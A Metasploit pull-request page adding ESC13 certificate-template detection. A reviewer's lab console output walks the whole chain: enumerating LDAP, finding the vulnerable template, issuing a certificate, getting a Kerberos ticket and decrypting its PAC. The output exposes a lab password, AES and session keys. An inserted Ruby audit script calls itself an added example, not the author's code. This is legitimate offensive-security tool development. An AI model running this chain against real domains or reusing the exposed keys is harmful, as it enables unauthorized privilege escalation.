AD CS Updates for ESC13 #18892

Merged (8 commits), Feb 28, 2024

Conversation

zeroSteiner
Contributor

@zeroSteiner zeroSteiner commented Feb 26, 2024

This makes some changes necessary for users to leverage the latest ESC technique, ESC13. Actually exploiting ESC13 did not require any code changes to the icpr_cert module so the changes contained within this PR are related to the identification of misconfigured certificate templates and workflow documentation.

The ldap_esc_vulnerable_cert_finder module was also updated to establish an authenticated LDAP connection exactly once.

The ldap_query module was also updated with the new changes to Rex::Text that allow tables to more clearly print nested rows (see #18849). Also the DN is now printed with the commas, which means the value can just be copied and pasted into a location where a DN is expected. DNs are supposed to have commas AFAIK so I'm not sure why they were removed at first.

Verification

For steps, you can basically follow along with the blog starting at the "ESC13 Demo" section.

  • Use the ldap_query module to identify the group RID (this is why the objectSID is added to the default queries)
  • Use the ldap_esc_vulnerable_cert_finder module to find the vulnerable certificate
  • Issue the certificate with icpr_cert
  • Use kerberos/get_ticket to obtain a TGT
  • Use kerberos/inspect_ticket to decrypt the PAC and see the group RID from step 1 in the ticket
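The template check the finder module performs and the PAC check in the last step, written out as an added example; this is not Metasploit's or the author's code (Ruby because that is the project's language) and it does not talk to LDAP. The template and OID objects are constructed stand-ins for the directory entries: the attribute names are the real AD CS schema attributes, the issuance-policy OIDs and group DN are made up, and the domain SID and RIDs are the ones printed further down this thread. The ESC13 preconditions encoded here (client-authentication EKU, no manager approval or RA signature, enrollment rights for a low-privileged principal, an issuance policy whose OID object carries msDS-OIDToGroupLink) follow the public description of the technique and are an assumption about, not a copy of, the module's logic.

```ruby
# Added example (not Metasploit code). Audits certificate templates for the
# ESC13 condition and checks a decrypted PAC for the linked group's RID.
# Template/OID objects are constructed stand-ins for LDAP entries.

# EKUs that allow the issued certificate to authenticate as its subject.
CLIENT_AUTH_EKUS = %w[
  1.3.6.1.5.5.7.3.2
  1.3.6.1.4.1.311.20.2.2
  1.3.6.1.5.2.3.4
  2.5.29.37.0
].freeze # Client Authentication, Smart Card Logon, PKINIT Client Auth, Any Purpose

# Principals whose enrollment rights make a template reachable to any domain member.
WELL_KNOWN_LOW_PRIV = %w[S-1-1-0 S-1-5-11 S-1-5-32-545].freeze # Everyone, Authenticated Users, Users
LOW_PRIV_RIDS = [513, 515].freeze                                # Domain Users, Domain Computers

CT_FLAG_PEND_ALL_REQUESTS = 0x2 # msPKI-Enrollment-Flag bit: manager approval required

def low_priv_sid?(sid)
  return true if WELL_KNOWN_LOW_PRIV.include?(sid)
  sid.start_with?('S-1-5-21-') && LOW_PRIV_RIDS.include?(sid.split('-').last.to_i)
end

# Returns the DNs of the groups an ESC13 template would inject into issued
# certificates, or [] as soon as any precondition fails.
def esc13_groups(template, oid_objects)
  return [] unless template[:enabled]
  return [] if (template['msPKI-Enrollment-Flag'] & CT_FLAG_PEND_ALL_REQUESTS) != 0
  return [] if template['msPKI-RA-Signature'].to_i > 0
  ekus = template['pKIExtendedKeyUsage']
  return [] unless ekus.empty? || (ekus & CLIENT_AUTH_EKUS).any? # empty list = no EKU restriction
  return [] unless template[:enroll_sids].any? { |sid| low_priv_sid?(sid) }

  template['msPKI-Certificate-Policy'].filter_map do |oid|
    oid_objects.dig(oid, 'msDS-OIDToGroupLink') # nil when the OID object has no group link
  end
end

# Template name => linked group DNs, only for templates that fail the audit.
def audit_templates(templates, oid_objects)
  templates.each_with_object({}) do |t, findings|
    groups = esc13_groups(t, oid_objects)
    findings[t[:name]] = groups unless groups.empty?
  end
end

# Last verification step: the PAC lists groups as domain-relative RIDs, so the
# linked group's SID must share the logon domain SID and its RID must be present.
def pac_has_group?(logon_domain_sid, pac_group_rids, group_sid)
  return false unless group_sid.start_with?("#{logon_domain_sid}-")
  pac_group_rids.include?(group_sid.split('-').last.to_i)
end

# ---- constructed sample data ------------------------------------------------
DOMAIN_SID = 'S-1-5-21-3474343397-3755413101-2031708755' # from the thread output
LINKED_OID   = '1.3.6.1.4.1.311.21.8.1111.2222.3333.1.400' # made-up issuance policy
UNLINKED_OID = '1.3.6.1.4.1.311.21.8.1111.2222.3333.1.401' # made-up, no group link

OID_OBJECTS = {
  LINKED_OID   => { 'msDS-OIDToGroupLink' => 'CN=ESC13-Group,CN=Users,DC=example,DC=local' },
  UNLINKED_OID => {}
}.freeze

BASE_TEMPLATE = {
  enabled: true,
  enroll_sids: ["#{DOMAIN_SID}-512", "#{DOMAIN_SID}-513"], # Domain Admins, Domain Users
  'msPKI-Enrollment-Flag' => 0,
  'msPKI-RA-Signature' => 0,
  'pKIExtendedKeyUsage' => ['1.3.6.1.5.5.7.3.2'],
  'msPKI-Certificate-Policy' => [LINKED_OID]
}.freeze

def template(name, overrides = {})
  BASE_TEMPLATE.merge(overrides).merge(name: name)
end

TEMPLATES = [
  template('ESC13-Test'),                                                        # all preconditions met
  template('Approval-Required', 'msPKI-Enrollment-Flag' => CT_FLAG_PEND_ALL_REQUESTS),
  template('WebServer-Policy', 'pKIExtendedKeyUsage' => ['1.3.6.1.5.5.7.3.1']),  # server auth only
  template('Admins-Only', enroll_sids: ["#{DOMAIN_SID}-512"]),
  template('Unlinked-Policy', 'msPKI-Certificate-Policy' => [UNLINKED_OID])
].freeze

if __FILE__ == $PROGRAM_NAME
  audit_templates(TEMPLATES, OID_OBJECTS).each do |name, groups|
    puts "#{name}: ESC13 groups: #{groups.join(', ')}"
  end
  puts "PAC carries linked group: #{pac_has_group?(DOMAIN_SID, [10052, 513], "#{DOMAIN_SID}-10052")}"
end
```

The audit deliberately stops at the first failed precondition, so a template that requires manager approval or only carries a server-authentication EKU is not reported even if its issuance policy is linked to a group; the PAC check refuses a group SID from another domain because PAC RIDs are only meaningful relative to the logon domain SID.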

Contributor

@jheysel-r7 jheysel-r7 left a comment


Thanks for the addition @zeroSteiner! Verification steps were clear and easy to follow. Also the mermaid diagrams look great. I found one rather inconsequential typo in one of the docs, but other than that the PR looks good.

Verification Steps

Use the ldap_query module to identify the group RID which will be used later to confirm everything worked successfully.

msf6 auxiliary(gather/ldap_query) > options

Module options (auxiliary/gather/ldap_query):

   Name           Current Setting           Required  Description
   ----           ---------------           --------  -----------
   BASE_DN                                  no        LDAP base DN if you already have it
   DOMAIN         COLLALABS1                no        The domain to authenticate to
   OUTPUT_FORMAT  table                     yes       The output format to use (Accepted: csv, table, json)
   PASSWORD       Password1!                no        The password to authenticate with
   RHOSTS         3.19.108.211              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          389                       yes       The target port
   SSL            false                     no        Enable SSL on the LDAP connection
   USERNAME       aliddle@collalabs1.local  no        The username to authenticate with


   When ACTION is RUN_QUERY_FILE:

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   QUERY_FILE_PATH                   no        Path to the JSON or YAML file to load and run queries from


   When ACTION is RUN_SINGLE_QUERY:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   QUERY_ATTRIBUTES                   no        Comma separated list of attributes to retrieve from the server
   QUERY_FILTER                       no        Filter to send to the target LDAP server to perform the query


Auxiliary action:

   Name           Description
   ----           -----------
   ENUM_ACCOUNTS  Dump info about all known user accounts in the domain.



View the full module info with the info, or info -d command.

msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 3.19.108.211

[*] Discovering base DN automatically
[+] 3.19.108.211:389 Discovered base DN: DC=collalabs1,DC=local
[+] 3.19.108.211:389 Discovered schema DN: DC=collalabs1,DC=local

<output of 8922 entries redacted>

CN=Alice Liddle,CN=Users,DC=collalabs1,DC=local
===============================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 displayname         Alice Liddle
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2024-02-27 21:04:29 UTC
 logoncount          2
 name                Alice Liddle
 objectsid           S-1-5-21-3474343397-3755413101-2031708755-10051
 pwdlastset
 samaccountname      aliddle
 useraccountcontrol  66048
 userprincipalname   aliddle@collalabs1.local

[*] Query returned 8923 results.
[*] Auxiliary module execution completed


Use the ldap_esc_vulnerable_cert_finder module to find the vulnerable certificate

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > options

Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):

   Name                  Current Setting           Required  Description
   ----                  ---------------           --------  -----------
   BASE_DN                                         no        LDAP base DN if you already have it
   DOMAIN                COLLALABS1                no        The domain to authenticate to
   PASSWORD              Password1!                no        The password to authenticate with
   REPORT_NONENROLLABLE  false                     yes       Report nonenrollable certificate templates
   RHOSTS                3.19.108.211              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 389                       yes       The target port
   SSL                   false                     no        Enable SSL on the LDAP connection
   USERNAME              aliddle@collalabs1.local  no        The username to authenticate with


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
[*] Running module against 3.19.108.211

[*] Discovering base DN automatically
[+] 3.19.108.211:389 Discovered base DN: DC=collalabs1,DC=local
[*] Template: SubCA
[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]    Issuing CAs:
[*]       * collalabs1-SRV-ADDS01-CA
[*]          Server: SRV-ADDS01.collalabs1.local
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: ESC1-Test
[*]    Distinguished Name: CN=ESC1-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*]    Vulnerable to: ESC1
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]    Issuing CAs:
[*]       * collalabs1-SRV-ADDS01-CA
[*]          Server: SRV-ADDS01.collalabs1.local
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: User
[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*]    Vulnerable to: ESC3_TEMPLATE_2
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]    Issuing CAs:
[*]       * collalabs1-SRV-ADDS01-CA
[*]          Server: SRV-ADDS01.collalabs1.local
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: Administrator
[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*]    Vulnerable to: ESC3_TEMPLATE_2
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]    Issuing CAs:
[*]       * collalabs1-SRV-ADDS01-CA
[*]          Server: SRV-ADDS01.collalabs1.local
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: Machine
[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*]    Vulnerable to: ESC3_TEMPLATE_2
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-515 (Domain Computers)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]    Issuing CAs:
[*]       * collalabs1-SRV-ADDS01-CA
[*]          Server: SRV-ADDS01.collalabs1.local
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: DomainController
[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*]    Vulnerable to: ESC3_TEMPLATE_2
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3474343397-3755413101-2031708755-498 (Enterprise Read-only Domain Controllers)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-516 (Domain Controllers)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]       * S-1-5-9 (Enterprise Domain Controllers)
[*]    Issuing CAs:
[*]       * collalabs1-SRV-ADDS01-CA
[*]          Server: SRV-ADDS01.collalabs1.local
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: ESC13-Test
[*]    Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*]    Vulnerable to: ESC13
[*]    Notes: ESC13 groups: ESC13-Group
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]    Issuing CAs:
[*]       * collalabs1-SRV-ADDS01-CA
[*]          Server: SRV-ADDS01.collalabs1.local
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Auxiliary module execution completed


Issue the certificate with icpr_cert for the certificate ESC13-Test that was found to be vulnerable to ESC13 by using the previous module.

msf6 auxiliary(admin/dcerpc/icpr_cert) > options

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name           Current Setting           Required  Description
   ----           ---------------           --------  -----------
   ALT_DNS                                  no        Alternative certificate DNS
   ALT_SID                                  no        Alternative object SID
   ALT_UPN                                  no        Alternative certificate UPN (format: USER@DOMAIN)
   CA             collalabs1-SRV-ADDS01-CA  yes       The target certificate authority
   CERT_TEMPLATE  ESC13-Test                yes       The certificate template
   ON_BEHALF_OF                             no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                      no        Certificate to request on behalf of
   RHOSTS         3.19.108.211              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445                       yes       The target port (TCP)
   SMBDomain      COLLALABS1                no        The Windows domain to use for authentication
   SMBPass        Password1!                no        The password for the specified username
   SMBUser        aliddle                   no        The username to authenticate as


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 3.19.108.211

[*] 3.19.108.211:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 3.19.108.211:445 - Binding to \cert...
[+] 3.19.108.211:445 - Bound to \cert
[*] 3.19.108.211:445 - Requesting a certificate for user aliddle - digest algorithm: SHA256 - template: ESC13-Test
[+] 3.19.108.211:445 - The requested certificate was issued.
[*] 3.19.108.211:445 - Certificate Email: aliddle@collalabs1.local
[*] 3.19.108.211:445 - Certificate SID: S-1-5-21-3474343397-3755413101-2031708755-10051
[*] 3.19.108.211:445 - Certificate UPN: aliddle@collalabs1.local
[*] 3.19.108.211:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20240227130259_default_3.19.108.211_windows.ad.cs_318482.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >

Use kerberos/get_ticket to obtain a TGT by using the cert obtained in the previous module.

msf6 auxiliary(admin/kerberos/get_ticket) > options

Module options (auxiliary/admin/kerberos/get_ticket):

   Name           Current Setting                                      Required  Description
   ----           ---------------                                      --------  -----------
   AES_KEY        69d0110edb378e28afb6fedcffb5506d6a6427a346594ec2a8d  no        The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
                  c1b699c6521c3
   CERT_FILE      /Users/jheysel/.msf4/loot/20240227130259_default_3.  no        The PKCS12 (.pfx) certificate file to authenticate with
                  19.108.211_windows.ad.cs_318482.pfx
   CERT_PASSWORD                                                       no        The certificate file's password
   DOMAIN         COLLALABS1                                           no        The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
   NTHASH                                                              no        The NT hash in hex string. Server must support RC4
   PASSWORD       Password1!                                           no        The domain user's password
   RHOSTS         3.19.108.211                                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploi
                                                                                 t.html
   RPORT          88                                                   yes       The target port
   Timeout        10                                                   yes       The TCP timeout to establish Kerberos connection and read data
   USERNAME       aliddle                                              no        The domain user


   When ACTION is GET_TGS:

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   IMPERSONATE                   no        The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
   Krb5Ccname                    no        The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked
   SPN                           no        The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local


Auxiliary action:

   Name     Description
   ----     -----------
   GET_TGT  Request a Ticket-Granting-Ticket (TGT)



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/kerberos/get_ticket) > run
[*] Running module against 3.19.108.211

[!] Warning: Provided principal and realm (aliddle@COLLALABS1) do not match entries in certificate:
[!]   * aliddle@collalabs1.local
[*] 3.19.108.211:88 - Getting TGT for aliddle@COLLALABS1
[+] 3.19.108.211:88 - Received a valid TGT-Response
[*] 3.19.108.211:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20240227130352_default_3.19.108.211_mit.kerberos.cca_179249.bin
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket)

Use kerberos/inspect_ticket to decrypt the PAC; we see that the group RID from step 1, S-1-5-21-3474343397-3755413101-2031708755-10051, is in the ticket.

msf6 auxiliary(admin/kerberos/inspect_ticket) > options

Module options (auxiliary/admin/kerberos/inspect_ticket):

   Name         Current Setting                                                                            Required  Description
   ----         ---------------                                                                            --------  -----------
   AES_KEY      69d0110edb378e28afb6fedcffb5506d6a6427a346594ec2a8dc1b699c6521c3                           no        The krbtgt/service AES key
   NTHASH                                                                                                  no        The krbtgt/service nthash
   TICKET_PATH  /Users/jheysel/.msf4/loot/20240227130352_default_3.19.108.211_mit.kerberos.cca_179249.bin  yes       Path to the ticket (ccache/kirbi format) you wish to inspect


View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/inspect_ticket) > run
[*] Running module against 3.19.108.211

[*] Credentials cache: File:/Users/jheysel/.msf4/loot/20240227130352_default_3.19.108.211_mit.kerberos.cca_179249.bin
[*] Primary Principal: aliddle@COLLALABS1.LOCAL
Ccache version: 4

Creds: 1
  Credential[0]:
    Server: krbtgt/COLLALABS1.LOCAL@COLLALABS1.LOCAL
    Client: aliddle@COLLALABS1.LOCAL
    Ticket etype: 18 (AES256)
    Key: 21a8bacfb0672d14f42eca9a36d453c5819d92c88194bf57a236e6715cea355e
    Subkey: false
    Ticket Length: 1390
    Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
    Addresses: 0
    Authdatas: 0
    Times:
      Auth time: 2024-02-27 13:04:29 -0800
      Start time: 2024-02-27 13:04:29 -0800
      End time: 2024-02-27 23:04:29 -0800
      Renew Till: 2024-02-28 13:03:51 -0800
    Ticket:
      Ticket Version Number: 5
      Realm: COLLALABS1.LOCAL
      Server Name: krbtgt/COLLALABS1.LOCAL
      Encrypted Ticket Part:
        Ticket etype: 18 (AES256)
        Key Version Number: 2
        Decrypted (with key: 69d0110edb378e28afb6fedcffb5506d6a6427a346594ec2a8dc1b699c6521c3):
          Times:
            Auth time: 2024-02-27 13:04:29 -0800
            Start time: 2024-02-27 13:04:29 -0800
            End time: 2024-02-27 23:04:29 -0800
            Renew Till: 2024-02-28 13:03:51 -0800
          Client Addresses: 0
          Transited: tr_type: 0, Contents: ""
          Client Name: 'aliddle'
          Client Realm: 'COLLALABS1.LOCAL'
          Ticket etype: 18 (AES256)
          Session Key: 21a8bacfb0672d14f42eca9a36d453c5819d92c88194bf57a236e6715cea355e
          Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT)
          PAC:
            Validation Info:
              Logon Time: 2024-02-22 13:34:04 -0800
              Logoff Time: Never Expires (inf)
              Kick Off Time: Never Expires (inf)
              Password Last Set: 2024-02-15 06:55:11 -0800
              Password Can Change: 2024-02-16 06:55:11 -0800
              Password Must Change: Never Expires (inf)
              Logon Count: 1
              Bad Password Count: 0
              User ID: 10051
              Primary Group ID: 513
              User Flags: 32
                .... .... .... .... ..0. .... .... .... Used Lmv2 Auth And Ntlmv2 Session Key: The USED_LMV2_AUTH_AND_NTLMV2_SESSION_KEY bit is NOT SET
                .... .... .... .... ...0 .... .... .... Used Lmv2 Auth And Session Key: The USED_LMV2_AUTH_AND_SESSION_KEY bit is NOT SET
                .... .... .... .... .... 0... .... .... Used Ntlmv2 Auth And Session Key: The USED_NTLMV2_AUTH_AND_SESSION_KEY bit is NOT SET
                .... .... .... .... .... .0.. .... .... Profile Path Populated: The PROFILE_PATH_POPULATED bit is NOT SET
                .... .... .... .... .... ..0. .... .... Resource Group Ids: The RESOURCE_GROUP_IDS bit is NOT SET
                .... .... .... .... .... ...0 .... .... Accepts Ntlmv2: The ACCEPTS_NTLMV2 bit is NOT SET
                .... .... .... .... .... .... 0... .... Machine Account: The MACHINE_ACCOUNT bit is NOT SET
                .... .... .... .... .... .... .0.. .... Sub Authentication: The SUB_AUTHENTICATION bit is NOT SET
                .... .... .... .... .... .... ..1. .... Extra Sids: The EXTRA_SIDS bit is SET
                .... .... .... .... .... .... .... 0... Lan Manager: The LAN_MANAGER bit is NOT SET
                .... .... .... .... .... .... .... ..0. No Encryption: The NO_ENCRYPTION bit is NOT SET
                .... .... .... .... .... .... .... ...0 Guest: The GUEST bit is NOT SET
              User Session Key: 00000000000000000000000000000000
              User Account Control: 528
                .... .... ..0. .... .... .... .... .... Use Aes Keys: The USE_AES_KEYS bit is NOT SET
                .... .... ...0 .... .... .... .... .... Partial Secrets Account: The PARTIAL_SECRETS_ACCOUNT bit is NOT SET
                .... .... .... 0... .... .... .... .... No Auth Data Required: The NO_AUTH_DATA_REQUIRED bit is NOT SET
                .... .... .... .0.. .... .... .... .... Trusted To Authenticate For Delegation: The TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION bit is NOT SET
                .... .... .... ..0. .... .... .... .... Password Expired: The PASSWORD_EXPIRED bit is NOT SET
                .... .... .... ...0 .... .... .... .... Dont Require Preauth: The DONT_REQUIRE_PREAUTH bit is NOT SET
                .... .... .... .... 0... .... .... .... Use Des Key Only: The USE_DES_KEY_ONLY bit is NOT SET
                .... .... .... .... .0.. .... .... .... Not Delegated: The NOT_DELEGATED bit is NOT SET
                .... .... .... .... ..0. .... .... .... Trusted For Delegation: The TRUSTED_FOR_DELEGATION bit is NOT SET
                .... .... .... .... ...0 .... .... .... Smartcard Required: The SMARTCARD_REQUIRED bit is NOT SET
                .... .... .... .... .... 0... .... .... Encrypted Test Password Allowed: The ENCRYPTED_TEST_PASSWORD_ALLOWED bit is NOT SET
                .... .... .... .... .... .0.. .... .... Account Auto Lock: The ACCOUNT_AUTO_LOCK bit is NOT SET
                .... .... .... .... .... ..1. .... .... Dont Expire Password: The DONT_EXPIRE_PASSWORD bit is SET
                .... .... .... .... .... ...0 .... .... Server Trust Account: The SERVER_TRUST_ACCOUNT bit is NOT SET
                .... .... .... .... .... .... 0... .... Workstation Trust Account: The WORKSTATION_TRUST_ACCOUNT bit is NOT SET
                .... .... .... .... .... .... .0.. .... Interdomain Trust Account: The INTERDOMAIN_TRUST_ACCOUNT bit is NOT SET
                .... .... .... .... .... .... ..0. .... Mns Logon Account: The MNS_LOGON_ACCOUNT bit is NOT SET
                .... .... .... .... .... .... ...1 .... Normal Account: The NORMAL_ACCOUNT bit is SET
                .... .... .... .... .... .... .... 0... Temp Duplicate Account: The TEMP_DUPLICATE_ACCOUNT bit is NOT SET
                .... .... .... .... .... .... .... .0.. Password Not Required: The PASSWORD_NOT_REQUIRED bit is NOT SET
                .... .... .... .... .... .... .... ..0. Home Directory Required: The HOME_DIRECTORY_REQUIRED bit is NOT SET
                .... .... .... .... .... .... .... ...0 Account Disabled: The ACCOUNT_DISABLED bit is NOT SET
              Sub Auth Status: 0
              Last Successful Interactive Logon: No Time Set (0)
              Last Failed Interactive Logon: No Time Set (0)
              Failed Interactive Logon Count: 0
              Extra SID Count: 1
                SID: S-1-18-1, Attributes: 7
              Resource Group Count: 0
              Group Count: 2
              Group IDs:
                Relative ID: 10052
                Attributes: 7
                  ..0. .... .... .... .... .... .... .... Resource: The RESOURCE bit is NOT SET
                  .... .... .... .... .... .... .... 0... Owner: The OWNER bit is NOT SET
                  .... .... .... .... .... .... .... .1.. Enabled: The ENABLED bit is SET
                  .... .... .... .... .... .... .... ..1. Enabled By Default: The ENABLED_BY_DEFAULT bit is SET
                  .... .... .... .... .... .... .... ...1 Mandatory: The MANDATORY bit is SET
                Relative ID: 513
                Attributes: 7
                  ..0. .... .... .... .... .... .... .... Resource: The RESOURCE bit is NOT SET
                  .... .... .... .... .... .... .... 0... Owner: The OWNER bit is NOT SET
                  .... .... .... .... .... .... .... .1.. Enabled: The ENABLED bit is SET
                  .... .... .... .... .... .... .... ..1. Enabled By Default: The ENABLED_BY_DEFAULT bit is SET
                  .... .... .... .... .... .... .... ...1 Mandatory: The MANDATORY bit is SET
              Logon Domain ID: S-1-5-21-3474343397-3755413101-2031708755
              Effective Name: 'aliddle'
              Full Name: 'Alice Liddle'
              Logon Script: ''
              Profile Path: ''
              Home Directory: ''
              Home Directory Drive: ''
              Logon Server: 'SRV-ADDS01'
              Logon Domain Name: 'collalabs1'
            Credential information:
              {:ul_type=>2, :cb_buffer_size=>148, :offset=>624, :buffer=>{:pac_element=>{:ul_type=>2, :version=>0, :encryption_type=>18, :serialized_data=>[169, 41, 33, 219, 18, 145, 168, 95, 210, 161, 219, 201, 61, 57, 156, 223, 124, 22, 24, 1, 94, 253, 145, 117, 232, 89, 235, 121, 27, 124, 248, 173, 143, 35, 99, 247, 4, 63, 32, 164, 210, 18, 253, 101, 40, 151, 40, 111, 42, 111, 191, 124, 170, 164, 214, 244, 36, 201, 27, 239, 139, 198, 68, 77, 30, 98, 75, 84, 79, 198, 179, 253, 38, 164, 19, 194, 220, 39, 166, 43, 202, 30, 176, 225, 169, 133, 186, 246, 52, 251, 22, 181, 164, 129, 219, 133, 123, 193, 241, 188, 115, 114, 21, 51, 218, 105, 228, 138, 200, 2, 42, 248, 130, 110, 128, 16, 51, 161, 255, 149, 31, 128, 157, 5, 189, 223, 226, 241, 156, 208, 38, 85, 91, 58, 71, 100, 246, 180, 201, 180]}, :padding=>"\x00\x00\x00\x00"}}
            Pac Server Checksum:
              Signature: 81ee5fc17b37bf0b714d4f96
            Pac Privilege Server Checksum:
              Signature: 8039c69af57244f1bf43d21d
            Client Info:
              Name: 'aliddle'
              Client ID: 2024-02-27 13:04:29 -0800
            UPN and DNS Information:
              UPN: aliddle@collalabs1.local
              DNS Domain Name: COLLALABS1.LOCAL
              Flags: 2
                .... .... .... .... .... .... .... ..1. Sam Name And Sid: The SAM_NAME_AND_SID bit is SET
                .... .... .... .... .... .... .... ...0 Upn Name Constructed: The UPN_NAME_CONSTRUCTED bit is NOT SET
              SAM Name: aliddle
              SID: S-1-5-21-3474343397-3755413101-2031708755-10051
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
                .... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
            Pac Requestor:
              SID: S-1-5-21-3474343397-3755413101-2031708755-10051
[*] Auxiliary module execution completed

@jheysel-r7 jheysel-r7 self-assigned this Feb 28, 2024
@jheysel-r7 jheysel-r7 merged commit 4b54d43 into rapid7:master Feb 28, 2024
48 checks passed
@cdelafuente-r7
Contributor

Release Notes

